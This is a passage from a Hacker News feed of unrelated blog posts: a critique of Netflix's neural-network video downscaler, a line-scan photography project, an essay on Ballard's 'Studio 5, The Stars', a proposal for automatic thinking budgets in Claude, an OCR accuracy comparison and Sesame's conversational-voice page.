    2. It can be integrated as a drop-in solution, i.e., we do not need any other changes on the Netflix encoding side or the client device side. Millions of devices that support Netflix streaming automatically benefit from this solution.

    Take note of this for later: Netflix has many different clients and this assumes no changes to them.

    3. A distinct, NN-based, video processing block can evolve independently, be used beyond video downscaling and be combined with different codecs.

    Doubt

    Of course, we believe in the transformative potential of NN throughout video applications, beyond video downscaling. While conventional video codecs remain prevalent, NN-based video encoding tools are flourishing and closing the performance gap in terms of compression efficiency. The deep downscaler is our pragmatic approach to improving video quality with neural networks.

    “Closing the performance gap” is a rather optimistic framing of that, but I’ll save this for another post.

    Our approach to NN-based video downscaling

    The deep downscaler is a neural network architecture designed to improve the end-to-end video quality by learning a higher-quality video downscaler. It consists of two building blocks, a preprocessing block and a resizing block. The preprocessing block aims to prefilter the video signal prior to the subsequent resizing operation. The resizing block yields the lower-resolution video signal that serves as input to an encoder. We employed an adaptive network design that is applicable to the wide variety of resolutions we use for encoding.

    [Diagram: deep downscaler architecture, a preprocessing block followed by a resizing block]

    I’m not sure exactly what they mean by the adaptive network design here. A friend has suggested that maybe this just means fixed weights on the preprocessing block? I am, however, extremely skeptical of their claim that the results will generate to a wide variety of resolutions. Avoiding overfitting here would be fairly challenging, and there’s nothing in the post that inspires confidence they managed to overcome those difficulties. They hand-wave this away, but it seems critical to the entire project.

    During training, our goal is to generate the best downsampled representation such that, after upscaling, the mean squared error is minimized. Since we cannot directly optimize for a conventional video codec, which is non-differentiable, we exclude the effect of lossy compression in the loop. We focus on a robust downscaler that is trained given a conventional upscaler, like bicubic. Our training approach is intuitive and results in a downscaler that is not tied to a specific encoder or encoding implementation. Nevertheless, it requires a thorough evaluation to demonstrate its potential for broad use for Netflix encoding.

    Finally some details! I was curious how they’d solve the lack of a reference when training a downscaling model, and this sort of explains it; they optimized for PSNR when upscaled back to the original resolution, post-downscaling. My immediate thoughts upon reading this:

    1. Hrm, PSNR isn’t great[3].
    2. Which bicubic are we actually talking about? This is not filling me with confidence that the author knows much about video.
    3. So this is like an autoencoder, but with the decoder replaced with bicubic upscaling?
    4. Doesn’t that mean the second your TV decides to upscale with bilinear this all falls apart?
    5. Does Netflix actually reliably control the upscaling method on client devices[4]? They went out of their way to specify earlier that the project assumed no changes to the clients, after all!
    6. I wouldn’t call this intuitive. To be honest, it sounds kind of dumb and brittle.
    7. Not tying this to a particular encoder is sensible, but their differentiability reason makes no sense.

    The weirdest part here is the problem formulated in this way actually has a closed-form solution, and I bet it’s a lot faster to run than a neural net! ML is potentially good in more ambiguous scenarios, but here you’ve simplified things to the point that you can just do some math and write some code instead[5]!
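
    To illustrate that claim (my sketch, not anything from Netflix): if the upscaler is a fixed linear map U, and bicubic and bilinear upsampling both are, then choosing the low-resolution signal y to minimize ||x - U y||^2 is ordinary least squares, and the "optimal downscaler" is simply the pseudoinverse of U:

        import numpy as np

        def upsample_matrix(n_low, n_high):
            """Linear-interpolation upsampling as an explicit matrix.
            (Bicubic upsampling is also linear, so the same argument holds.)"""
            U = np.zeros((n_high, n_low))
            for i in range(n_high):
                t = i * (n_low - 1) / (n_high - 1)  # endpoint-aligned position
                j = min(int(t), n_low - 2)
                w = t - j
                U[i, j] = 1 - w
                U[i, j + 1] = w
            return U

        U = upsample_matrix(n_low=8, n_high=16)
        D = np.linalg.pinv(U)  # closed-form MSE-optimal downscaler for this U

        x = np.random.randn(16)           # toy 1-D "high-res" signal
        y = D @ x                         # downscale
        print(np.linalg.norm(x - U @ y))  # minimal over all possible y

    The 2-D case is the same idea with separable filters; no training loop required.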

    Improving Netflix video quality with neural networks

    The goal of the deep downscaler is to improve the end-to-end video quality for the Netflix member. Through our experimentation, involving objective measurements and subjective visual tests, we found that the deep downscaler improves quality across various conventional video codecs and encoding configurations.

    Judging from the example at the start, the subjective visual tests were conducted by the dumb and blind.

    For example, for VP9 encoding and assuming a bicubic upscaler, we measured an average VMAF Bjøntegaard-Delta (BD) rate gain of ~5.4% over the traditional Lanczos downscaling. We have also measured a ~4.4% BD rate gain for VMAF-NEG. We showcase an example result from one of our Netflix titles below. The deep downscaler (red points) delivered higher VMAF at similar bitrate or yielded comparable VMAF scores at a lower bitrate.

    Again, what’s the actual upscaling filter being used? And while I’m glad the VMAF is good, the result looks terrible! This means the VMAF is wrong. But also, the whole reason they’re following up with VMAF is because PSNR is not great and everyone knows it; it’s just convenient to calculate. Finally, how does VP9 come into play here? I’m assuming they’re encoding the downscaled video before upscaling, but the details matter a lot.
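
    For reference, since the post leans on them: BD-rate figures like the "~5.4% gain" above come from the standard Bjøntegaard calculation: fit log-bitrate as a low-order polynomial in the quality score for each rate-quality curve, then average the gap over the overlapping quality range. A minimal sketch (the textbook method, not Netflix's exact code):

        import numpy as np

        def bd_rate(rates_ref, quality_ref, rates_test, quality_test):
            """Average % bitrate change of the test curve vs. the reference
            at equal quality (negative = test needs fewer bits).
            Expects at least four rate/quality points per curve."""
            p_ref = np.polyfit(quality_ref, np.log(rates_ref), 3)
            p_test = np.polyfit(quality_test, np.log(rates_test), 3)
            lo = max(min(quality_ref), min(quality_test))
            hi = min(max(quality_ref), max(quality_test))
            # average each fit over the shared quality interval
            i_ref, i_test = np.polyint(p_ref), np.polyint(p_test)
            avg_ref = (np.polyval(i_ref, hi) - np.polyval(i_ref, lo)) / (hi - lo)
            avg_test = (np.polyval(i_test, hi) - np.polyval(i_test, lo)) / (hi - lo)
            return (np.exp(avg_test - avg_ref) - 1) * 100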

    Besides objective measurements, we also conducted human subject studies to validate the visual improvements of the deep downscaler. In our preference-based visual tests, we found that the deep downscaler was preferred by ~77% of test subjects, across a wide range of encoding recipes and upscaling algorithms. Subjects reported a better detail preservation and sharper visual look. A visual example is shown below. [note: example is the one from above]

    And wow, coincidentally, fake detail and oversharpening are common destructive behaviors from ML-based filtering that unsophisticated users will “prefer” despite making the video worse. If this is the bar, just run Warpsharp on everything and call it a day[6]; I’m confident you’ll get a majority of people to say it looks better.

    This example also doesn’t mention what resolution the video was downscaled to, so it’s not clear if this is even representative of actual use-cases. Once again, there are no real details about how the tests were conducted, so I have no way to judge whether the experiment structure made sense.

    We also performed A/B testing to understand the overall streaming impact of the deep downscaler, and detect any device playback issues. Our A/B tests showed QoE improvements without any adverse streaming impact. This shows the benefit of deploying the deep downscaler for all devices streaming Netflix, without playback risks or quality degradation for our members.

    Translating out the jargon, this means they didn’t have a large negative effect on compressability. This is unsurprising.

    How do we apply neural networks at scale efficiently?

    Given our scale, applying neural networks can lead to a significant increase in encoding costs. In order to have a viable solution, we took several steps to improve efficiency.

    Yes, which is why the closed-form solution almost certainly is faster.

    The neural network architecture was designed to be computationally efficient and also avoid any negative visual quality impact. For example, we found that just a few neural network layers were sufficient for our needs. To reduce the input channels even further, we only apply NN-based scaling on luma and scale chroma with a standard Lanczos filter.

    OK cool, so it’s not actually deep. Why should words have meaning, after all? Only needing a couple layers is not too shocking when, again, there’s a closed-form solution available.

    Also, while applying this to only the luma is potentially a nice idea, if it’s shifting the brightness around you can get very weird results. I imagine this is what causes the ‘fake detail’ in the example above.

    We implemented the deep downscaler as an FFmpeg-based filter that runs together with other video transformations, like pixel format conversions. Our filter can run on both CPU and GPU. On a CPU, we leveraged oneDnn to further reduce latency.

    OK sure, everything there runs on FFmpeg so why not this too.

    Integrating neural networks into our next-generation encoding platform

    The Encoding Technologies and Media Cloud Engineering teams at Netflix have jointly innovated to bring Cosmos, our next-generation encoding platform, to life. Our deep downscaler effort was an excellent opportunity to showcase how Cosmos can drive future media innovation at Netflix. The following diagram shows a top-down view of how the deep downscaler was integrated within a Cosmos encoding microservice.

    [Diagram: deep downscaler integration within a Cosmos encoding microservice]

    Buzzword buzzword buzzword buzzword buzzword. I especially hate “encoding stratum function”.

    A Cosmos encoding microservice can serve multiple encoding workflows. For example, a service can be called to perform complexity analysis for a high-quality input video, or generate encodes meant for the actual Netflix streaming. Within a service, a Stratum function is a serverless layer dedicated to running stateless and computationally-intensive functions. Within a Stratum function invocation, our deep downscaler is applied prior to encoding. Fueled by Cosmos, we can leverage the underlying Titus infrastructure and run the deep downscaler on all our multi-CPU/GPU environments at scale.

    Why is this entire section here? This should all have been deleted. Also, once again, buzzword buzzword buzzword buzzword buzzword.

    What lies ahead

    The deep downscaler paves the path for more NN applications for video encoding at Netflix. But our journey is not finished yet and we strive to improve and innovate. For example, we are studying a few other use cases, such as video denoising. We are also looking at more efficient solutions to applying neural networks at scale. We are interested in how NN-based tools can shine as part of next-generation codecs. At the end of the day, we are passionate about using new technologies to improve Netflix video quality. For your eyes only!

    I’m not sure a downscaler that takes a problem with a closed-form solution and produces terrible results paves the way for much of anything except more buzzword spam. I look forward to seeing what they will come up with for denoising!


    Thanks to Roger Clark and Will Overman for reading a draft of this post. Errors are of course my own.

    ]]>
    https://redvice.org/2025/encoding-requires-eyes/ hacker-news-small-sites-43201720 Fri, 28 Feb 2025 04:33:26 GMT
    <![CDATA[macOS Tips and Tricks (2022)]]> thread link) | @pavel_lishin
    February 27, 2025 | https://saurabhs.org/macos-tips | archive.org

    Unable to extract article]]>
    https://saurabhs.org/macos-tips hacker-news-small-sites-43201417 Fri, 28 Feb 2025 03:34:14 GMT
    <![CDATA[The line scan video picture]]> thread link) | @jfil
    February 27, 2025 | https://writing.leafs.quest/programming-fun/line-scanner | archive.org

    EDIT: Please look at the bottom to see the new code I came up with today!

    As part of my goal of dusting off my online web presence, I made links to quite a few of the public facing services that Adam has made for omg.lol members. Two of those I made were for the photos (drawing.leafs.quest) and the paste service (paste.leafs.quest).

    When I looked at these I found exactly one paste and one picture, both relating to each other. (There are a few more photos now as I've used it to host some images in an earlier blog-post.)

    The image doesn't actually show up properly until you click on it, all you get is a wall of text where I tried to describe what the image was. So, what actually is it?

    Line Scanners

    If you've ever seen the photo finish of a race, you'll see a weirdly distorted photo of the racers. Here's an example from Wikimedia:

A line-scan image of two cyclists crossing the finish line

You're not actually seeing an entire photo here; what you're seeing is a series of exposures of a single vertical strip of pixels, composited side-by-side. That's why the background looks like a big streak: the camera never sees any other part of the scene.

The reason they do this is that it gives them a literal photo of the finish that shows who came first. The person who won will be the one in front, and with this method you can tell down to the pixel.

    I'm not quite doing the description justice, but that is close enough for now.

    Why do I want to line scan?

    I am not interested in seeing who is the fastest, or who is first. I am interested in using it as a photography method. With something like this you can translate movement into an image. For instance, here is another fantastic photo from Wikimedia.

    A scan-line image of a cable car in San Francisco

    The description given by Wikimedia is:

    Modern line-scan camera image of a San Francisco cable car, imaged at 4000 frames per second. Note the background, which was unmoving and thus appears as a single vertical stripe.

This photo, and the bicycle one above, both show images taken when the camera is still and the subject is moving. I want to see what happens when we move the camera.

    How does this relate to that weird picture?

Quite a few years ago my dad was doing one of those fancy Christmas lights displays where you program each light to flash along with music and look really cool. I'm sure we've all seen YouTube videos of them by now. For the following year he really wanted to include his neighbours' houses in the display, but he complained that the camera perspective of the photos of each house didn't give a nice view when stitched together. In reality this was probably a tiny issue, but it's what originally got me thinking.

    Then years later I remember driving past a wall full of graffiti and thought about how cool it would be to photograph it. This time I thought about the fact that simply photographing each section then stitching it together would affect the artwork.

It was around that time that I learned about line-scan cameras and how they work. I wondered if I could use a video clip to emulate a line-scan camera by simply keeping only the middle column of pixels from each frame and putting those thin slices side-by-side to form a picture.

Well, turns out I could! After a little searching online and borrowing a few answers from Stack Overflow, I ended up with a script that can convert a video into a mock line-scan image. I tried a few videos of myself rolling back and forth past my webcam, and while they worked, I wanted something a bit more interesting.
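
The core of the idea fits in a few lines of opencv-python. Here's a minimal sketch (file names are placeholders, and the real script does a little more):

import cv2
import numpy as np

cap = cv2.VideoCapture("input.mp4")  # placeholder path
columns = []
while True:
    ok, frame = cap.read()
    if not ok:
        break
    mid = frame.shape[1] // 2
    columns.append(frame[:, mid])  # keep only the middle column of pixels
cap.release()

# Composite the one-pixel-wide slices side-by-side into one very wide image.
scan = np.stack(columns, axis=1)
cv2.imwrite("linescan.png", scan)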

One of my favourite types of videos to watch is the ones where people just walk around Japan and film the walk. No talking, just a first-person view of the walk. After looking through a few I decided to use Tokyo Yurikamome Train Side Window View - 4K by NIPPONWANDERINGTV. My hope was that using a train video would allow for better vertical stabilization.

Well, it worked! You can view the image here, and you'll need to zoom in because it's a wide boi. This image is a visual representation of the entire 33-minute video in a single frame. It's fun to study, as you can pick out some interesting features.

For instance, check out the snippet of the picture below.

    A line scan of a train station from a YouTube video. Read the blog explaining this here: https://writing.leafs.quest/programming-fun/Line-Scanner

This is the entire time the train was inside the terminal, starting at the 1:25 mark. Interestingly, the section where the image appears to be stretched is actually the time the train was stopped. Because the background is not moving, we end up with an image very similar to the background of those earlier bike racers.

    Final Thoughts and Next Steps

I really like this. I feel it's a different way of looking at the world. I don't know if it will ever work for the graffiti scanning I want to do, as it is VERY sensitive to up-and-down movement. But I still like the effect it produces. While I didn't write about it, here is another attempt I did with a video where the cameraman is walking around Tokyo.

    To my great dismay, I did not save the source of this video. But with this image you can see the up and down movement of each step. It's really interesting to see each person in the image as well.

My next step is to make this a bit easier to see. I'm thinking that instead of having one long image, I'll make a video with the image scrolling, where the rightmost pixel column is the current frame. I'll also be sure to keep the sound in it. Anyway, thanks for reading this long! :O

I was mucking around with it today and completely redid the code! Turns out it was entirely unnecessary to save all the frames to images in the first place, and I didn't even need Pillow. With a fair bit of Stack Overflow I managed to figure out how to do it all with just opencv-python! Check out the new code here!

    ]]>
    https://writing.leafs.quest/programming-fun/line-scanner hacker-news-small-sites-43201209 Fri, 28 Feb 2025 02:53:37 GMT
    <![CDATA[Studio 5, The Stars: The 1961 short story that anticipated the issue of Gen AI]]> thread link) | @ecliptik
    February 27, 2025 | https://aroundscifi.us/en/studio-5-the-stars-ballards-1961-short-that-already-told-the-story-of-text-generating-ais/ | archive.org

    As early as 1961 (in the short story Studio 5, The Stars), Ballard anticipated one of the most topical and controversial issues of the day: The generation of texts with machines (or AIs).

Studio 5, The Stars: Ballard’s 1961 short story that anticipated the issue of generative AI

Let me first explain how this came to pass. Well, from time to time I get together with a few friends at an old hunting lodge in a small grove not too far from my home. Imagine something like the Dead Poets Society from the movie, but we are less esoteric and have fewer hormones in our systems. We get together, have a few beers, and talk about books and stories. We look into each other's eyes and breathe the same air. In some ways, it is one of the most human dimensions we experience: we pick up shards of awe by looking at other people's faces. Amazing.

Dead Poets Society: the cave where the boys of the group gather to read and talk freely, in violation of the rules of the college.

But beyond this: at our last meeting, I shared with the others a Ballard (1930-2009) story that I had never read. The great thing is that it happened to me; I did not choose it. The way it works is that each of us brings something to read and then gives it to a group member of his choice. I was given Ballard's short story Studio 5, The Stars, first published in Science Fantasy magazine in 1961.

    The Verse-Transcriber

Ballard was Ballard! We know that he loved to describe, that he loved difficult and courtly words, that he was a fan of music, art, and mysticism. Ballard was a very erudite writer, so much so that sometimes it's hard to keep up with what he wrote, with the references he made. He always gave me the idea of someone in the middle of a pyramid of fiction and non-fiction books, studying astral maps and catching up on the physical and mathematical theories of his time (not very different from those of today). Or I imagine him wandering around some museum, some plaster-cast gallery, some art gallery. In short, when I started reading, I expected to find his quirks, the secrets you already know he won't tell you, and all the information he puts into the stories that you can only really understand on the third or even fourth reading. Instead, I was confronted with the VT (Verse-Transcriber), a machine that can produce texts based on initial parameters provided by the writer. Similar to the prompts you use with an AI.

    Wave IX

    When I read about this VT thing, I stopped. The others looked at me.
    “So, Michael, are ya gonna read?”
    “Get what Ballard means, guys?”
    “Nope, but if you keep reading, we might.”
    Well, I read on.
The story is set in Vermilion Sands (a fictional, dystopian place of Ballard's invention), where Paul Ransom, the main character, runs a publishing company that, among other things, produces a magazine of poetry (Wave IX). All the texts are generated by the VT, which is built by an IBM agency in a place named Red Beach. The heart of the story is Ransom's encounter with his mysterious new neighbor, Aurora Day. Every night and every morning, long strips of paper invade Ransom's yard, blown by the wind: they are Aurora Day's poetry. Fascinated and repulsed by this elusive woman, Ransom takes an interest in her. He even steps in to save her from falling off a cliff during one of her mystical night walks.

Erichtho Muse by John Hamilton Mortimer

    Evil Witch or Muse of Poetry?

Ballard's story orients our perceptions toward his habitual lunar light, his enigmatic reflections, his plays of light, his olfactory and auditory dystopias, in short, his typical science fiction writing. But what caught my attention was precisely the VT, this machine capable of producing written text, which in Studio 5, The Stars has so invaded human creative space that writers and poets no longer even remember how to write directly, that is, without the mediation of a machine. Aurora Day's role in this affair is to play Melander, the mythological Muse of Poetry, to whom the fate of the young poet Corydon is bound; to fulfill her desires, Corydon goes so far as to kill himself to create unforgettable poetic verse. Aurora Day/Melander's intention seems to be to force the writers and poets working for Ransom to return to the true essence of the art of writing and literature by destroying the VTs in their possession and starting to write by hand again. The only one who succeeds is the young Tristram Caldwell, who has never used a VT to write, preferring to continue in the more "human" way. He is the Corydon of the story.

I agreed with him, but of course Tony was somewhat prejudiced there, being one of those people who believed that literature was in essence both unreadable and unwritable. The automatic novel he had been “writing” was over ten million words long, intended to be one of those gigantic grotesques that tower over the highways of literary history, terrifying the unwary traveller.
    [From Studio 5, The Stars]

    VT: the end of the art of writing

Paul Ransom is convinced that his strange neighbor is a deranged, bored rich woman, so caught up in her own personal fantasies that she can no longer distinguish them from reality. This is partly true. Aurora Day seems to be some kind of witch, followed everywhere by a hideous faun butler with goat-like features. Life and death do not matter to her, nor does love; all that matters is art, the passion for poetry, for literary purity. She plays a role she is trapped in, convinced that she is some kind of inspiring muse bound to fulfill her destiny, even to the point of killing and persecuting those who will not follow her. A creepy character, but one who forces others to ask whether using machines to replace writers and poets means the end of the art of writing:

    She looked up at me idly, tracing patterns across the surface of the pool with a green-tipped finger.
    “It all depends on you and your companions. When will you come to your senses and become poets again?”
    I watched the patterns in the pool. In some miraculous way they remained etched across the surface.
    In the hours, like millennia, we had sat together I seemed to have told her everything about myself, yet learned almost nothing about Aurora. One thing alone was clear—her obsession with the art of poetry. In some curious way she regarded herself as personally responsible for the present ebb at which it found itself, but her only remedy seemed completely retrogressive.
    “You must come and meet my friends at the colony,” I suggested.
    “I will,” she said. “I hope I can help them. They all have so much to learn.”
I smiled at this. “I’m afraid you won’t find them very sympathetic to that view. Most of them regard themselves as virtuosos. For them the quest for the perfect sonnet ended years ago. The computer produces nothing else.”
    Aurora scoffed. “They’re not poets but mere mechanics. Look at these collections of so-called verse. Three poems and sixty pages of operating instructions. Nothing but volts and amps. When I say they have everything to learn, I mean about their own hearts, not about technique; about the soul of music, not its form.”
    She paused to stretch herself, her beautiful body uncoiling like a python. She leaned forward and began to speak earnestly. “Poetry is dead today, not because of these machines, but because poets no longer search for their true inspiration.”
    “Which is?”
    Aurora shook her head sadly. “You call yourself a poet and yet you ask me that?”
    [From Studio 5, The Stars]
Similar to OpenAI’s ChatGPT, Jasper Chat is a brand-spanking-new conversational chatbot.

    Is that what’s happening to us, too?

    In the end, we came to the conclusion that Ballard's genius anticipated a question that concerns us all today: When we use an AI to generate text and images (or whatever), who is the real author? Is it true writing? Are they really novels? Is it really poetry? Is it literature at all?
In Ballard's story, the writers have forgotten what it means to write on their own. They no longer know what it means to develop ideas; they just plug them into a machine and let it do the writing. Is that what’s happening to us, too? I believe that AI can be a valuable help and even partly replace humans in their creative role. But I also believe that an AI could not have written this story of Ballard's with the same inventiveness and perfection. I do believe that there is a distance between “skill” and “mastery” that no AI can ever bridge.
    At least, I hope I'm right.

More of Ballard's Short Stories

    • “Manhole 69” (1957)
    • “Chronopolis” (1960)
    • “The Voices of Time” (1960)
    • “The Overloaded Man” (1961)
    • “Billennium” (1961)
    • “Thirteen to Centaurus” (1962)
    • “The Subliminal Man” (1963)
    • “End-Game” (1963)
    • “Time of Passage” (1964)
    • “The Lost Leonardo” (1964)
    • “The Terminal Beach” (1964)
    • “The Drowned Giant” (1964)
    • “The Beach Murders” (1966)
• “The Assassination of John Fitzgerald Kennedy Considered as a Downhill Motor Race” (1966)
    • “Why I Want to Fuck Ronald Reagan” (1968)
    • “Notes Towards a Mental Breakdown” (1976)
    • “The Index” (1977)
    • “The Dead Time” (1977)
    • “News from the Sun” (1981)
    • “Myths of the Near Future” (1982)
    • “Memories of the Space Age” (1982)
    • “Answers to a Questionnaire” (1985)
    • “A Guide to Virtual Death” (1992)

    More Insights

    • Miracles of Life: Shanghai to Shepperton: An Autobiography (2008) - James Ballard's autobiography, detailing his childhood in Shanghai, experiences during World War II, and his writing career.
• Running Wild (1988) - A novella about a massacre in an exclusive gated community, told through a psychiatrist's forensic diary.
    • A User's Guide to the Millennium: Essays and Reviews (1996) - A collection of Ballard's essays and book reviews on various topics, including literature, art, and contemporary issues.
    • Extreme Metaphors: Selected Interviews with J.G. Ballard (2012) - A comprehensive collection of interviews spanning Ballard's career, offering insights into his ideas and creative process.

    Verse Transcriber-related news articles [here]:
     - 200,000 Computer-Generated Books
     - Computer 'Aesop' Writes Fables With A Moral
     - Scheherazade, An Open Story Generator
     - The Next (Computer) Rembrandt
     - Xiaoice AI Now A Poet
     - Shelley.ai AI Terrifies Thanks To Reddit's Nosleep
     - Deepfakes From OpenAI GPT-2 Algorithm

    ]]>
    https://aroundscifi.us/en/studio-5-the-stars-ballards-1961-short-that-already-told-the-story-of-text-generating-ais/ hacker-news-small-sites-43201012 Fri, 28 Feb 2025 02:25:21 GMT
    <![CDATA[Think Toggles Are Dumb]]> thread link) | @NiloCK
    February 27, 2025 | https://www.paritybits.me/think-toggles-are-dumb/ | archive.org

    Claude 3.7 was released a few days ago. Its code output is yet another impressive jump up from the already excellent Claude 3.5 and 3.5 (new) aka 3.5.1 aka 3.6.

    Another major addition is the Extended mode, where Claude does a Chain-of-Thought style deliberation before providing a final response to the query. It's accessible via the web interface for the mere cost of two clicks per interaction:


    (Or five keystrokes, if you're that way inclined - tab down down down enter)

In real life, I explicitly prompt humans to actively think more often than most people do. I was a teacher, and I currently have two young kids. But for most people, in most situations, this is a very unnatural thing to think about.

    If I ask a Spaniard what the capital of Spain is I would expect, and be happy with, an off-the-cuff response. If I ask the same Spaniard for a summary of treatment options for a rare disease, and also gave them a bunch of diagnostic materials and family history, I would expect a more deliberated response.

    Importantly: I wouldn't have to tell him the difference.

    All this to say: a manual think toggle betrays some stupidity in the overall mechanism. It also severely dampens the ability for conversations to naturally wander between periods of lighter and deeper substance.

    A more natural way to interact is for the assistant, like a person, to exercise some judgement about how much effort to put into a given response.

    The basic structure is simple:

    • The user asks a question / provides some prompt.
    • The model assigns a complexity score to it.
    • Below a certain threshold, the model responds immediately.
• Above the threshold, the model allocates a thinking budget proportional to the complexity score, and then responds.

    It's so simple that Claude 3.7 (almost) produced a PoC from one prompt. I rounded some edges and the PoC is now live at http://nilock.github.io/autothink. This is a Bring-your-own-API-Key affair, and the browser communicates directly with the Anthropic API.

    Note below that the simple query provides no option to examine the thinking tokens, because there are none. Thinking is conditioned on the user inputs. The progress bars embedded in Claude's responses give the perceived complexity of the prompts, rated from 0-100 (complexity 10 is the thinking threshold).

[Screenshots: AutoThink UI, and AutoThink handling a hard query]

    The mechanics here are as simple as the bullet points above. We pre-fire the user query for the complexity estimate:

import Anthropic from "@anthropic-ai/sdk";

// Client setup (assumed here; the PoC runs in the browser with a
// user-supplied key, hence dangerouslyAllowBrowser):
const anthropic = new Anthropic({ apiKey, dangerouslyAllowBrowser: true });

const response = await anthropic.messages.create({
      model: "claude-3-7-sonnet-20250219",
      max_tokens: 50,
      system:
        "You are an AI assistant that analyzes query complexity and returns ONLY a number from 0-100.",
      messages: [
        // [ ] todo: incorporate the entire conversation context.
        {
          role: "user",
          content: `
    Please analyze the following user query and rate its
    complexity on a scale from 0-100, where 0 means a simple,
    straightforward question requiring minimal reasoning, and 100
    means an extremely complex problem requiring intensive
    step-by-step analysis. Provide ONLY a number between 0-100
    with no explanation.
    
    User query: "${query}"`,
        },
      ],
    });
    const score = parseInt(response.content[0].text.trim(), 10);
    

    I used 3.7-sonnet as the analyst, which is probably overkill. I expect that 3.7-haiku would give good-enough results for the purpose.

    Once we get a complexity score, we run it through a helper to scale the thinking token budget:

const calculateThinkingBudget = (complexityScore) => {
  // Below the threshold, skip extended thinking entirely
  if (complexityScore < 10) return 0;
    
      // Scale from minimum (1024) to maximum (32000) based on complexity
      const minBudget = 1024;
      const maxBudget = 32000;
      return Math.round(
        minBudget + (maxBudget - minBudget) * (complexityScore / 100),
      );
    };
    

    and finally resend the original query with the allocated thinking budget:

    await anthropic.messages.create({
      model: "claude-3-7-sonnet-20250219",
      max_tokens: budget + 4000, // 4000 here for the actual response
      system: "You are Claude, a helpful AI assistant.",
      messages: newMessages.map((msg) => ({
        role: msg.role,
        content: msg.content,
      })),
      thinking:
        budget > 0
          ? {
              type: "enabled",
              budget_tokens: budget,
            }
          : {
              type: "disabled",
            },
    });
    

In practice, the thinking threshold and budgeting would be adjusted for cost / benefit, and according to load, etc. But there you go - a Claude that automatically thinks when it expects it might help, and answers off the cuff where appropriate, in about a dozen lines of functional code.

Developers love knobs, and frontier AI research labs seem like developer-heavy organizations. But consumer tools can't have a lot of knobs.

    The extended toggle presents people with two options:

    1. forget that it exists
    2. think about it every time they interact with the product

    But both are bad! The first because it's hard to do long-term, and whenever you are reminded, you suffer the FOMO of having misused a powerful tool. The second because it's just a pain in the butt and an overall quality-of-life reduction.

    From 3.0 onward, part of Claude's stickiness advantage has been how consistently pleasant it's been to interact with. The knobby-ness of the UI chips away at that advantage.

    ]]>
    https://www.paritybits.me/think-toggles-are-dumb/ hacker-news-small-sites-43201008 Fri, 28 Feb 2025 02:24:40 GMT
    <![CDATA[Putting Andrew Ng's OCR models to the test]]> thread link) | @ritvikpandey21
    February 27, 2025 | https://www.runpulse.com/blog/putting-andrew-ngs-ocr-models-to-the-test | archive.org

    February 27, 2025

    3 min read

    Putting Andrew Ng’s OCR Models to The Test

    Today, Andrew Ng, one of the legends of the AI world, released a new document extraction service that went viral on X (link here). At Pulse, we put the models to the test with complex financial statements and nested tables – the results were underwhelming to say the least, and suffer from many of the same issues we see when simply dumping documents into GPT or Claude.

    Our engineering team, along with many X users, discovered alarming issues when testing complex financial statements:

    • Over 50% hallucinated values in complex financial tables
    • Missing negative signs and currency markers
    • Completely fabricated numbers in several instances
    • 30+ second processing times per document

[Images: Ground Truth, Andrew Ng OCR Output, and Pulse Output compared]

    When financial decisions worth millions depend on accurate extraction, these errors aren't just inconvenient – they're potentially catastrophic.

    Let’s run through some quick math: in a typical enterprise scenario with 1,000 pages containing 200 elements per page (usually repeated over tens of thousands of documents), even 99% accuracy still means 2,000 incorrect entries. That's 2,000 potential failure points that can completely compromise a data pipeline. Our customers have consistently told us they need over 99.9% accuracy for mission-critical operations. With probabilistic LLM models, each extraction introduces a new chance for error, and these probabilities compound across thousands of documents, making the failure rate unacceptably high for real-world applications where precision is non-negotiable.
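
To make the compounding concrete, here is that back-of-the-envelope math in a few lines of Python (assuming, as a simplification, independent per-element errors):

pages, elements_per_page, accuracy = 1_000, 200, 0.99

total_elements = pages * elements_per_page          # 200,000 elements
expected_errors = total_elements * (1 - accuracy)   # 2,000 incorrect entries
prob_clean_page = accuracy ** elements_per_page     # ~13.4% of pages are error-free

print(expected_errors, f"{prob_clean_page:.1%}")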

    As we've detailed in our previous viral blog post, using LLMs alone for document extraction creates fundamental problems. Their nondeterministic nature means you'll get different results on each run. Their low spatial awareness makes them unsuitable for complex layouts in PDFs and slides. And their processing speed presents serious bottlenecks for large-scale document processing.

    At Pulse, we've taken a different approach that delivers:

• Accurate extraction, with the probability of errors approaching zero
    • Complete table, chart and graph data preservation
    • Low-latency processing time per document

    Our solution combines proprietary table transformer models built from the ground up with traditional computer vision algorithms. We use LLMs only for specific, controlled tasks where they excel – not as the entire extraction pipeline. 

    If your organization processes financial, legal, or healthcare documents at scale and needs complete reliability (or really any industry where accuracy is non-negotiable), we'd love to show you how Pulse can transform your workflow.

    Book a demo here to see the difference for yourself.

    ]]>
    https://www.runpulse.com/blog/putting-andrew-ngs-ocr-models-to-the-test hacker-news-small-sites-43201001 Fri, 28 Feb 2025 02:24:04 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @nelwr
    February 27, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice#demo | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

